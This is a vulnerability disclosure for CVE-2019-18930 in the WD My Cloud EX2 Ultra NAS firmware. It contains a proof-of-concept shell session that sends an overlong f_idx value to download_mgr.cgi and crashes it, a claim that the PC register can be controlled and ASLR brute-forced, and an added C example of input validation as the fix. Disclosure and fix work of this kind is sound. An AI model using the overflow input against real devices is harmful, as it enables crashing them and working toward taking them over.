CVE-2019-18930

Information

Target      : WD My Cloud EX2 Ultra
Version     : 2.31.183, 2.31.195

Proof of Concept

root@MyCloudEX2Ultra cgi-bin # export REQUEST_METHOD=GET
root@MyCloudEX2Ultra cgi-bin # export QUERY_STRING=cmd=Downloads_Schedule_Info\&f_idx=`python -c 'print "a"*0x1f3 + "bbbb"'`
root@MyCloudEX2Ultra cgi-bin # ./download_mgr.cgi
I/O warning : failed to load external entity "/mnt/HD_a4/.systemfile/schedcfgs/aaaaaa (etc.) aaaaabbbb.xml"
Segmentation fault

https://youtu.be/x_YNsGnqG1o

Exploit

It is possible to control the PC register and to bypass ASLR with a brute-force attack.
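
On the fix side, the warning in the Proof of Concept shows the f_idx value placed unmodified into a path under /mnt/HD_a4/.systemfile/schedcfgs/. The following is an added example, not code from the WD firmware or from this repository, of building that path with a bounded, validated identifier so that a value of the PoC's length is rejected before any copy takes place. The function names, the 64-character limit and the allowed character set are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Directory and suffix as they appear in the warning printed by the PoC. */
#define SCHED_DIR "/mnt/HD_a4/.systemfile/schedcfgs/"
#define SCHED_EXT ".xml"
#define F_IDX_MAX 64 /* assumption: illustrative limit, not the firmware's */

/* Hypothetical allow-list: ASCII letters, digits, '_' and '-'. Rejecting
 * '/' and '.' also keeps the resulting path inside SCHED_DIR. */
static int f_idx_is_valid(const char *f_idx)
{
    size_t i;

    if (f_idx == NULL)
        return 0;
    for (i = 0; f_idx[i] != '\0'; i++) {
        unsigned char c = (unsigned char)f_idx[i];
        if (i >= F_IDX_MAX)
            return 0; /* too long: stop before reading any further */
        if (!((c >= '0' && c <= '9') || (c >= 'a' && c <= 'z') ||
              (c >= 'A' && c <= 'Z') || c == '_' || c == '-'))
            return 0;
    }
    return i > 0; /* an empty value is rejected as well */
}

/* Writes the schedule path into out[out_len]. Returns 0 on success, -1 if
 * f_idx is rejected or the path would not fit; out is "" on failure. */
int build_sched_path(char *out, size_t out_len, const char *f_idx)
{
    int n;

    if (out == NULL || out_len == 0)
        return -1;
    out[0] = '\0';
    if (!f_idx_is_valid(f_idx))
        return -1;
    n = snprintf(out, out_len, "%s%s%s", SCHED_DIR, f_idx, SCHED_EXT);
    if (n < 0 || (size_t)n >= out_len) { /* truncation is a failure */
        out[0] = '\0';
        return -1;
    }
    return 0;
}
```

A CGI handler using this would return an error response whenever build_sched_path() returns -1 instead of passing the value on to the XML loader.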